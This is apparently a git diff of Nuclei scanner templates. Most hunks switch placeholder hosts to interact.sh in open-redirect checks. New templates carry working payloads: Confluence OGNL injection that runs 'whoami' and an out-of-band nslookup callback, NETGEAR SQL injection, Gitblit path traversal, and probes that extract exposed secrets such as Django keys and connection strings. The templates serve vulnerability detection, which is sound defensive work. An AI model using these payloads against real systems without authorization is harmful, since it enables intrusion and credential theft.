@ -20,7 +20,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |+
|
- |+
|
||||||
GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
|
GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
|
@ -34,6 +34,6 @@ requests:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "com\"/onmouseover=\"alert(1)\">"
|
- "sh\"/onmouseover=\"alert(1)\">"
|
||||||
|
|
||||||
# Enhanced by mp on 2022/04/21
|
# Enhanced by mp on 2022/04/21
|
||||||
|
|
|
@ -20,10 +20,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
|
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
|
@ -34,11 +34,11 @@ requests:
|
||||||
-----------------------------138742543134772812001999326589
|
-----------------------------138742543134772812001999326589
|
||||||
Content-Disposition: form-data; name="reg_email"
|
Content-Disposition: form-data; name="reg_email"
|
||||||
|
|
||||||
{{randstr}}@example.com
|
{{randstr}}@interact.sh
|
||||||
-----------------------------138742543134772812001999326589
|
-----------------------------138742543134772812001999326589
|
||||||
Content-Disposition: form-data; name="reg_password"
|
Content-Disposition: form-data; name="reg_password"
|
||||||
|
|
||||||
{{randstr}}@example.com
|
{{randstr}}@interact.sh
|
||||||
-----------------------------138742543134772812001999326589
|
-----------------------------138742543134772812001999326589
|
||||||
Content-Disposition: form-data; name="reg_password_present"
|
Content-Disposition: form-data; name="reg_password_present"
|
||||||
|
|
||||||
|
@ -46,11 +46,11 @@ requests:
|
||||||
-----------------------------138742543134772812001999326589
|
-----------------------------138742543134772812001999326589
|
||||||
Content-Disposition: form-data; name="reg_first_name"
|
Content-Disposition: form-data; name="reg_first_name"
|
||||||
|
|
||||||
{{randstr}}@example.com
|
{{randstr}}@interact.sh
|
||||||
-----------------------------138742543134772812001999326589
|
-----------------------------138742543134772812001999326589
|
||||||
Content-Disposition: form-data; name="reg_last_name"
|
Content-Disposition: form-data; name="reg_last_name"
|
||||||
|
|
||||||
{{randstr}}@example.com
|
{{randstr}}@interact.sh
|
||||||
-----------------------------138742543134772812001999326589
|
-----------------------------138742543134772812001999326589
|
||||||
Content-Disposition: form-data; name="_wp_http_referer"
|
Content-Disposition: form-data; name="_wp_http_referer"
|
||||||
|
|
||||||
|
@ -89,7 +89,7 @@ requests:
|
||||||
Origin: {{BaseURL}}
|
Origin: {{BaseURL}}
|
||||||
Referer: {{BaseURL}}
|
Referer: {{BaseURL}}
|
||||||
|
|
||||||
log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In
|
log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /wp-admin/ HTTP/1.1
|
GET /wp-admin/ HTTP/1.1
|
||||||
|
|
|
@ -21,13 +21,13 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}//example.com/%2f..'
|
- '{{BaseURL}}//interact.sh/%2f..'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -20,12 +20,12 @@ requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com'
|
- '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/16
|
# Enhanced by mp on 2022/03/16
|
||||||
|
|
|
@ -19,7 +19,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/auth/logout?continue=//example.com"
|
- "{{BaseURL}}/auth/logout?continue=//interact.sh"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -33,6 +33,6 @@ requests:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
||||||
|
|
||||||
# Enhanced by mp on 2022/02/27
|
# Enhanced by mp on 2022/02/27
|
||||||
|
|
|
@ -21,14 +21,14 @@ requests:
|
||||||
- |
|
- |
|
||||||
GET / HTTP/1.1
|
GET / HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
X-Forwarded-Host: //example.com
|
X-Forwarded-Host: //interact.sh
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -19,7 +19,7 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/lab.html?vpath=//example.com"
|
- "{{BaseURL}}/lab.html?vpath=//interact.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
@ -22,10 +22,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1'
|
- '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
|
@ -17,10 +17,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com"
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
|
|
@ -20,12 +20,12 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/index.php/example.com'
|
- '{{BaseURL}}/index.php/interact.sh'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/08
|
# Enhanced by mp on 2022/03/08
|
||||||
|
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2022-26134
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Confluence - Remote Code Execution via OGNL template injection
|
||||||
|
author: pdteam,jbertman
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center.
|
||||||
|
reference:
|
||||||
|
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
|
||||||
|
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
|
||||||
|
- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
|
||||||
|
- https://jira.atlassian.com/browse/CONFSERVER-79016
|
||||||
|
classification:
|
||||||
|
cve-id: CVE-2022-26134
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.component:"Atlassian Confluence"
|
||||||
|
tags: cve,cve2022,confluence,rce,ognl,oast
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
|
||||||
|
- "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
req-condition: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(to_lower(all_headers_1), "x-cmd-response:")'
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(interactsh_protocol, "dns")'
|
||||||
|
- 'contains(to_lower(response_2), "confluence")'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
part: header
|
||||||
|
kval:
|
||||||
|
- "x_cmd_response"
|
|
@ -0,0 +1,44 @@
|
||||||
|
id: CVE-2022-29383
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: NETGEAR ProSafe SSL VPN firmware - SQL Injection
|
||||||
|
author: elitebaz
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
|
||||||
|
reference:
|
||||||
|
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-29383
|
||||||
|
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
|
||||||
|
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2022-29383
|
||||||
|
metadata:
|
||||||
|
verified: "true"
|
||||||
|
tags: cve,cve2022,sqli,netgear,router
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /scgi-bin/platform.cgi HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
||||||
|
|
||||||
|
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /scgi-bin/platform.cgi HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
||||||
|
|
||||||
|
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- contains(body_1, "User authentication Failed")
|
||||||
|
- contains(body_2, "User Login Failed for SSLVPN User.")
|
||||||
|
condition: and
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: CVE-2022-31268
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gitblit 1.9.3 - Path traversal
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
A Path Traversal vulnerability in Gitblit 1.9.3 can lead to reading website files via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
|
||||||
|
reference:
|
||||||
|
- https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2022-31268
|
||||||
|
- https://vuldb.com/?id.200500
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2022-31268
|
||||||
|
cwe-id: CWE-22
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.html:"Gitblit"
|
||||||
|
verified: "true"
|
||||||
|
tags: cve,cve2022,lfi,gitblit
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/resources//../WEB-INF/web.xml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</web-app>"
|
||||||
|
- "java.sun.com"
|
||||||
|
- "gitblit.properties"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "application/xml"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: eventum-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Eventum Panel Detect
|
||||||
|
author: princechaddha
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.favicon.hash:305412257
|
||||||
|
tags: panel,eventum
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
max-redirects: 2
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<title>Login - Eventum</title>'
|
||||||
|
- 'title="Eventum Issues search"'
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'Database Error:'
|
||||||
|
- 'There seems to be a problem connecting to the database server specified in your configuration file'
|
||||||
|
condition: and
|
|
@ -2,23 +2,38 @@ id: zte-panel
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: ZTE Panel
|
name: ZTE Panel
|
||||||
author: github.com/its0x08
|
author: its0x08,idealphase
|
||||||
severity: info
|
severity: info
|
||||||
|
description: |
|
||||||
|
ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.
|
||||||
|
reference:
|
||||||
|
- https://www.zte.com.cn/global/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.html:"ZTE Corporation"
|
||||||
tags: panel,zte
|
tags: panel,zte
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "ZTE Corporation. All rights reserved. </div>"
|
- "ZTE Corporation. All rights reserved. </div>"
|
||||||
- '<form name="fLogin" id="fLogin" method="post" onsubmit="return false;" action="">'
|
- '<form name="fLogin" id="fLogin" method="post" onsubmit="return false;" action="">'
|
||||||
part: body
|
|
||||||
condition: and
|
condition: and
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: header
|
||||||
words:
|
words:
|
||||||
- "Mini web server 1.0 ZTE corp 2005."
|
- "Mini web server 1.0 ZTE corp 2005."
|
||||||
part: header
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '<div class="type"><font id="">(.+)<\/font><\/div>'
|
||||||
|
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: appsettings-file-disclosure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Application Setting file disclosure
|
||||||
|
author: DhiyaneshDK,tess
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
appsetting.json file discloses the DB connection strings containing sensitive information.
|
||||||
|
reference:
|
||||||
|
- https://twitter.com/hacker_/status/1518003548855930882?s=20&t=BVauK0yUjVl5yL7rwy0Eag
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
tags: exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/appsettings.json"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "ConnectionStrings"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "application/json"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,46 @@
|
||||||
|
id: django-secret-key
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Django Secret Key Exposure
|
||||||
|
author: geeknik,DhiyaneshDk
|
||||||
|
severity: high
|
||||||
|
reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:settings.py
|
||||||
|
tags: django,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/settings.py"
|
||||||
|
- "{{BaseURL}}/app/settings.py"
|
||||||
|
- "{{BaseURL}}/django/settings.py"
|
||||||
|
- "{{BaseURL}}/settings/settings.py"
|
||||||
|
- "{{BaseURL}}/web/settings/settings.py"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "SECRET_KEY ="
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
negative: true
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '"DJANGO_SECRET_KEY", "(.*)"'
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: ftpconfig
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Atom remote-ssh ftpconfig Exposure
|
||||||
|
author: geeknik,DhiyaneshDK
|
||||||
|
description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials
|
||||||
|
severity: high
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:ftpconfig
|
||||||
|
tags: atom,ftp,config,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.ftpconfig"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"protocol":'
|
||||||
|
- '"host":'
|
||||||
|
- '"user":'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: git-mailmap
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Git Mailmap File Disclosure
|
||||||
|
author: geeknik,DhiyaneshDK
|
||||||
|
severity: low
|
||||||
|
reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: html:mailmap
|
||||||
|
tags: config,exposure,git,mailmap
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.mailmap"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "# Theresa O'Connor:"
|
||||||
|
negative: true
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: php-ini
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Php.ini File Disclosure
|
||||||
|
author: geeknik,DhiyaneshDK
|
||||||
|
severity: low
|
||||||
|
reference: https://www.php.net/manual/en/configuration.file.php
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: php.ini
|
||||||
|
tags: config,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/php.ini"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "[PHP]"
|
||||||
|
- "short_open_tag"
|
||||||
|
- "safe_mode"
|
||||||
|
- "expose_php"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -11,10 +11,10 @@ info:
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}//example.com/%2F..'
|
- '{{BaseURL}}//interact.sh/%2F..'
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -13,7 +13,7 @@ self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "https://api.debounce.io/v1/?api={{token}}&email=test@example.com"
|
- "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
|
|
|
@ -15,7 +15,7 @@ self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- https://fullhunt.io/api/v1/domain/example.com/details
|
- https://fullhunt.io/api/v1/domain/interact.sh/details
|
||||||
headers:
|
headers:
|
||||||
X-API-Key: "{{token}}"
|
X-API-Key: "{{token}}"
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ self-contained: true
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- https://sslmate.com/api/v2/certs/example.com?expand=current.crt
|
- https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt
|
||||||
headers:
|
headers:
|
||||||
Authorization: Bearer {{token}}
|
Authorization: Bearer {{token}}
|
||||||
|
|
||||||
|
|
|
@ -13,9 +13,9 @@ requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /?{{randstr}}=9 HTTP/1.1
|
GET /?{{randstr}}=9 HTTP/1.1
|
||||||
X-Forwarded-Prefix: prefix.cache.example.com
|
X-Forwarded-Prefix: prefix.cache.interact.sh
|
||||||
X-Forwarded-Host: host.cache.example.com
|
X-Forwarded-Host: host.cache.interact.sh
|
||||||
X-Forwarded-For: for.cache.example.com
|
X-Forwarded-For: for.cache.interact.sh
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET /?{{randstr}}=9 HTTP/1.1
|
GET /?{{randstr}}=9 HTTP/1.1
|
||||||
|
@ -24,10 +24,10 @@ requests:
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'contains(body_2, "cache.example.com")'
|
- 'contains(body_2, "cache.interact.sh")'
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
part: response
|
part: response
|
||||||
regex:
|
regex:
|
||||||
- "(prefix|host|for).cache.example.com"
|
- "(prefix|host|for).cache.interact.sh"
|
||||||
|
|
|
